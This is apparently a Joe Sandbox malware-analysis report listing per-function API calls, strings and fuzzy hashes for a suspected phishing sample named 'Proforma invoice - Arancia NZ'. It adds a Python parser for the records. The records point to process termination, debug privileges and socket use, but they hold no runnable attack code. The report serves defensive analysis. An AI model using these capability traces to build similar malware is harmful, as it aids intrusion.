                                                                                                                    • Opcode Fuzzy Hash: 5838325f1fb1cced0414245c542c6aca419f9fe11e1b69494ec56a4f22981ccd
                                                                                                                    • Instruction Fuzzy Hash: 0C01AC75641344FFE650ABA5ED4DF673B6CEB89711F408421FA09DB1A1CA70DC008A24
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                    • API String ID: 0-572801152
                                                                                                                    • Opcode ID: 582bebcd469bf368d50a20965037c9334485df26dce11421c5843babdfb7dafa
                                                                                                                    • Instruction ID: f597d305f8f7818b69b93a91894f3d469fd428a77e46a28a8f5d6a228c11fa9f
                                                                                                                    • Opcode Fuzzy Hash: 582bebcd469bf368d50a20965037c9334485df26dce11421c5843babdfb7dafa
                                                                                                                    • Instruction Fuzzy Hash: 40C19171A1020A9FDF10DF98D888FAEB7F5BF58314F15856EE905A7280E7709D90CB90
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002A710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?,?,002A7455), ref: 002A7127
                                                                                                                      • Part of subcall function 002A710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A7142
                                                                                                                      • Part of subcall function 002A710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?,?), ref: 002A7150
                                                                                                                      • Part of subcall function 002A710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,002A7044,80070057,?), ref: 002A7160
                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 002C9806
                                                                                                                    • _memset.LIBCMT ref: 002C9813
                                                                                                                    • _memset.LIBCMT ref: 002C9956
                                                                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 002C9982
                                                                                                                    • CoTaskMemFree.OLE32(?), ref: 002C998D
                                                                                                                    Strings
                                                                                                                    • NULL Pointer assignment, xrefs: 002C99DB
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                                                                    • String ID: NULL Pointer assignment
                                                                                                                    • API String ID: 1300414916-2785691316
                                                                                                                    • Opcode ID: 41959c2d8a7f0b2bbda4b0b5e83448aa3b831e3aaa39d7fbd1f74af2d9ec26ee
                                                                                                                    • Instruction ID: 013a0d7aa72a0fe139255b8640951696c6e7ff63a8ca923a5cfcb68fc4a31a58
                                                                                                                    • Opcode Fuzzy Hash: 41959c2d8a7f0b2bbda4b0b5e83448aa3b831e3aaa39d7fbd1f74af2d9ec26ee
                                                                                                                    • Instruction Fuzzy Hash: 62914871D10229EBDB10DFA5DC44EDEBBB9EF08310F20415AF819A7291DB719A54CFA0
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 002D6E24
                                                                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 002D6E38
                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 002D6E52
                                                                                                                    • _wcscat.LIBCMT ref: 002D6EAD
                                                                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 002D6EC4
                                                                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 002D6EF2
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$Window_wcscat
                                                                                                                    • String ID: SysListView32
                                                                                                                    • API String ID: 307300125-78025650
                                                                                                                    • Opcode ID: 6f121051919d465626e0716eab651159a34240e4704f6856fb0ce62e6590515a
                                                                                                                    • Instruction ID: 651316155ec59f9393e2fefa1924c419641d749ca19ab11beec5563bb71d2254
                                                                                                                    • Opcode Fuzzy Hash: 6f121051919d465626e0716eab651159a34240e4704f6856fb0ce62e6590515a
                                                                                                                    • Instruction Fuzzy Hash: FF41BD71A10309EFEB21DF64DC89FEA77A9EF08350F10442BF585A72D1D6729DA48B60
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 002B3C55: CreateToolhelp32Snapshot.KERNEL32 ref: 002B3C7A
                                                                                                                      • Part of subcall function 002B3C55: Process32FirstW.KERNEL32(00000000,?), ref: 002B3C88
                                                                                                                      • Part of subcall function 002B3C55: CloseHandle.KERNEL32(00000000), ref: 002B3D52
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CE9A4
                                                                                                                    • GetLastError.KERNEL32 ref: 002CE9B7
                                                                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002CE9E6
                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 002CEA63
                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 002CEA6E
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 002CEAA3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                     • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                     • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                    • String ID: SeDebugPrivilege
                                                                                                                    • API String ID: 2533919879-2896544425
                                                                                                                    • Opcode ID: 325d59870d29ff5ebc84fc52a98528173b2b88f73a04ee6adf8c3d9737f7bd68
                                                                                                                    • Instruction ID: 8fe8628a841c90769abf8b65f1a98fc7d2dd2ba795d8ae6007f837a26cb6633d
                                                                                                                    • Opcode Fuzzy Hash: 325d59870d29ff5ebc84fc52a98528173b2b88f73a04ee6adf8c3d9737f7bd68
                                                                                                                    • Instruction Fuzzy Hash: D241A8716202019FDB10EF24DC99F6EBBA5AF40310F19855DF9069B2C2CBB1AD68CF95
                                                                                                                    APIs
                                                                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 002B3033
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: IconLoad
                                                                                                                    • String ID: blank$info$question$stop$warning
                                                                                                                    • API String ID: 2457776203-404129466
                                                                                                                    • Opcode ID: 13963b51a579867161c37ded26534ad5ba3a518d8b6864362a9ed2a2a1e8c4a9
                                                                                                                    • Instruction ID: eb0ce2326c29df55cf4023aff4652bd8236e8c6667afc9ead5890f1c69a3e28f
                                                                                                                    • Opcode Fuzzy Hash: 13963b51a579867161c37ded26534ad5ba3a518d8b6864362a9ed2a2a1e8c4a9
                                                                                                                    • Instruction Fuzzy Hash: 1311383266D347BAE715EF14DC82CEB679C9F1A3A0F10442AF904661C2DAB06F6445A4
                                                                                                                    APIs
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002B4312
                                                                                                                    • LoadStringW.USER32(00000000), ref: 002B4319
                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 002B432F
                                                                                                                    • LoadStringW.USER32(00000000), ref: 002B4336
                                                                                                                    • _wprintf.LIBCMT ref: 002B435C
                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 002B437A
                                                                                                                    Strings
                                                                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 002B4357
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                    • API String ID: 3648134473-3128320259
                                                                                                                    • Opcode ID: 2e2b052a844e1749e83b2731ecbf9cf816ea3aa2f3100b50c0820a976bbbc5c6
                                                                                                                    • Instruction ID: 0b07c05575a8a4f2f3dc22f4fcee26cba207fe55d429819b88771cf937a9fbf2
                                                                                                                    • Opcode Fuzzy Hash: 2e2b052a844e1749e83b2731ecbf9cf816ea3aa2f3100b50c0820a976bbbc5c6
                                                                                                                    • Instruction Fuzzy Hash: F00162F2D01208BFE751ABA4EE8DEE6776CDB08300F1045A6B74AE2051EA749E954B74
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 002DD47C
                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 002DD49C
                                                                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 002DD6D7
                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 002DD6F5
                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 002DD716
                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 002DD735
                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 002DD75A
                                                                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 002DD77D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1211466189-0
                                                                                                                    • Opcode ID: 25a032fd4ff7d2ffded0b27ed8d0b379e49b2d630f69eccdfeee9deb2a5022bf
                                                                                                                    • Instruction ID: 462fd722b6efd3f13201d8fd4de1b0552a51cd1008fbe57f6342b9a41b99f06e
                                                                                                                    • Opcode Fuzzy Hash: 25a032fd4ff7d2ffded0b27ed8d0b379e49b2d630f69eccdfeee9deb2a5022bf
                                                                                                                    • Instruction Fuzzy Hash: EDB19B75A00A16EFDF14CF68C9857AD7BB5BF08701F0880AAEC489B295D770AD60CB90
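The function records above share one fixed layout (an "APIs" list of `Name.MODULE(args), ref: ADDR` lines, optional "Strings" with `xrefs`, a "Memory Dump Source" block and a "Similarity" block of key/value IDs). Across a report this size that layout is easier to query than to read, so the following parser is added here as an editor's example; it is not part of the Joe Sandbox report or of the analysed sample. It turns each record into a structured object, keeps the call-site addresses so the in-function call order can be recovered, and distinguishes calls made directly from calls reported via "Part of subcall function". The `SAMPLE` text is constructed from two of the records printed above (the MessageBoxW record and the dialog-resize record); the "Memory Dump Source" and "Joe Sandbox IDA Plugin" sections are deliberately skipped.

```python
"""Parse Joe Sandbox per-function records ("APIs" / "Strings" / "Similarity"
blocks from the IDA plugin output) into structured data, so the API call
sequence of each analysed function can be queried and compared."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source",
                   "Joe Sandbox IDA Plugin", "Similarity"}

# "LoadStringW.USER32(00000000), ref: 002B4319"; CRT calls such as
# "_wprintf.LIBCMT ref: 002B435C" carry no argument list, and calls reached
# through a callee are prefixed "Part of subcall function <addr>: ".
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z_][\w@:]*)\.(?P<module>[A-Za-z0-9]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
STRING_RE = re.compile(r"^(?P<value>.*), xrefs: (?P<xref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^(?P<key>[A-Za-z ]+?): ?(?P<value>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: int                    # address of the call site
    subcall_of: Optional[int]   # callee address when reported as a subcall


@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: Dict[str, int] = field(default_factory=dict)  # value -> xref addr
    similarity: Dict[str, str] = field(default_factory=dict)

    def api_names(self) -> set:
        return {c.name for c in self.apis}


def parse_records(text: str) -> List[FunctionRecord]:
    """Split report text into one FunctionRecord per "APIs" header."""
    records: List[FunctionRecord] = []
    section = None
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":
                records.append(FunctionRecord())
            section = line
            continue
        if not records:
            continue  # text before the first record
        rec = records[-1]
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = m.group("args")
                rec.apis.append(ApiCall(
                    name=m.group("name"), module=m.group("module"),
                    args=args.split(",") if args else [],
                    ref=int(m.group("ref"), 16),
                    subcall_of=int(m.group("sub"), 16) if m.group("sub") else None))
        elif section == "Strings":
            m = STRING_RE.match(line)
            if m:
                rec.strings[m.group("value")] = int(m.group("xref"), 16)
        elif section == "Similarity":
            m = KV_RE.match(line)
            if m:
                rec.similarity[m.group("key")] = m.group("value")
    return records


def call_sequence(rec: FunctionRecord) -> List[str]:
    """Direct API calls of the function in call-site order (subcalls excluded)."""
    own = [c for c in rec.apis if c.subcall_of is None]
    return [c.name for c in sorted(own, key=lambda c: c.ref)]


def functions_calling(records: List[FunctionRecord], api_name: str) -> List[FunctionRecord]:
    """Records whose direct or subcall API set contains api_name."""
    return [r for r in records if api_name in r.api_names()]


# Constructed input: two records copied from the report above.
SAMPLE = """
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 002B4312
• LoadStringW.USER32(00000000), ref: 002B4319
• _wprintf.LIBCMT ref: 002B435C
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 002B437A
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 002B4357
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
APIs
  • Part of subcall function 00252612: GetWindowLongW.USER32(?,000000EB), ref: 00252623
• GetSystemMetrics.USER32(0000000F), ref: 002DD47C
• MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 002DD6D7
• ShowWindow.USER32(00000003,00000000), ref: 002DD735
Similarity
• API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
• String ID:
• API String ID: 1211466189-0
"""

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE)):
        print(i, rec.similarity.get("API String ID"), call_sequence(rec))
```

Feeding the whole report text to `parse_records` gives one object per function; `functions_calling` then answers questions such as which functions reach `TerminateProcess` or `MessageBoxW`, and comparing `call_sequence` output between two samples is a cheap way to spot shared runtime code before looking at the fuzzy hashes.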
                                                                                                                    APIs
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0028C1C7,00000004,00000000,00000000,00000000), ref: 00252ACF
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0028C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00252B17
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0028C1C7,00000004,00000000,00000000,00000000), ref: 0028C21A
                                                                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0028C1C7,00000004,00000000,00000000,00000000), ref: 0028C286
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ShowWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1268545403-0
                                                                                                                    • Opcode ID: 560dc66a26a8f5e37e842c204b3b526ab92e61867c65841e8fa76fcf7b7fd938
                                                                                                                    • Instruction ID: b67c92e719c37bfdf96e9c7889df04f50465204058672653711f8b14bf095be5
                                                                                                                    • Opcode Fuzzy Hash: 560dc66a26a8f5e37e842c204b3b526ab92e61867c65841e8fa76fcf7b7fd938
                                                                                                                    • Instruction Fuzzy Hash: 7B414B34635681DAC7399F289C8CB6A7B95AB87301F248419EC87425E0C770DC6DD728
                                                                                                                    APIs
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 002B70DD
                                                                                                                      • Part of subcall function 00270DB6: std::exception::exception.LIBCMT ref: 00270DEC
                                                                                                                      • Part of subcall function 00270DB6: __CxxThrowException@8.LIBCMT ref: 00270E01
                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 002B7114
                                                                                                                    • EnterCriticalSection.KERNEL32(?), ref: 002B7130
                                                                                                                    • _memmove.LIBCMT ref: 002B717E
                                                                                                                    • _memmove.LIBCMT ref: 002B719B
                                                                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 002B71AA
                                                                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 002B71BF
                                                                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 002B71DE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 256516436-0
                                                                                                                    • Opcode ID: 7beb51bdda5170c5757a4977f7eb4082182f872e3b06e6e1eb66f90be59999db
                                                                                                                    • Instruction ID: 1f1a4a0bb402ab2ef3879a7269bc9df3386a854602f7a8fbbac1d44d9fdc6693
                                                                                                                    • Opcode Fuzzy Hash: 7beb51bdda5170c5757a4977f7eb4082182f872e3b06e6e1eb66f90be59999db
                                                                                                                    • Instruction Fuzzy Hash: A7315031910205EBDB10DFA4DD89AAFB778EF45710F1481A6F9089B256DB709E24CB64
                                                                                                                    APIs
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 002D61EB
                                                                                                                    • GetDC.USER32(00000000), ref: 002D61F3
                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002D61FE
                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 002D620A
                                                                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 002D6246
                                                                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 002D6257
                                                                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,002D902A,?,?,000000FF,00000000,?,000000FF,?), ref: 002D6291
                                                                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 002D62B1
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3864802216-0
                                                                                                                    • Opcode ID: 52e141b6d815ff7a5810647f773fdc28b3f093491986806b8f27d79aa32cdaba
                                                                                                                    • Instruction ID: 3e41f29eb26b5276d8e5c882dfd1611875a730ae2cf403aff5f7cbaa702d6022
                                                                                                                    • Opcode Fuzzy Hash: 52e141b6d815ff7a5810647f773fdc28b3f093491986806b8f27d79aa32cdaba
                                                                                                                    • Instruction Fuzzy Hash: 68319C72201210BFEB118F20DC8EFEA3BADEF49761F044066FE099A291C6759C51CBA4
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _memcmp
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2931989736-0
                                                                                                                    • Opcode ID: 0a52ae35ae62463039b6f7a4e50fd5f700a7b5713355f7878b75d6f7036bc4db
                                                                                                                    • Instruction ID: c15f8b562d02b6a695341cfe41d0983a98293bfff24e5cab1a878c2e8d40a9aa
                                                                                                                    • Opcode Fuzzy Hash: 0a52ae35ae62463039b6f7a4e50fd5f700a7b5713355f7878b75d6f7036bc4db
                                                                                                                    • Instruction Fuzzy Hash: 2921F571670246BFA2066A269D53FBB735DAE1335CF048412FD0996283EF64DE34C5B1
APIs
  • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
  • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
  • Part of subcall function 0026FC86: _wcscpy.LIBCMT ref: 0026FCA9
• _wcstok.LIBCMT ref: 002BEC94
• _wcscpy.LIBCMT ref: 002BED23
• _memset.LIBCMT ref: 002BED56
Strings
Memory Dump Source
• Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
Similarity
• API ID: _wcscpy$__itow__swprintf_memset_wcstok
• String ID: X
• API String ID: 774024439-3081909835
APIs
• __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 002C6C00
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 002C6C21
• WSAGetLastError.WSOCK32(00000000), ref: 002C6C34
• htons.WSOCK32(?,?,?,00000000,?), ref: 002C6CEA
• inet_ntoa.WSOCK32(?), ref: 002C6CA7
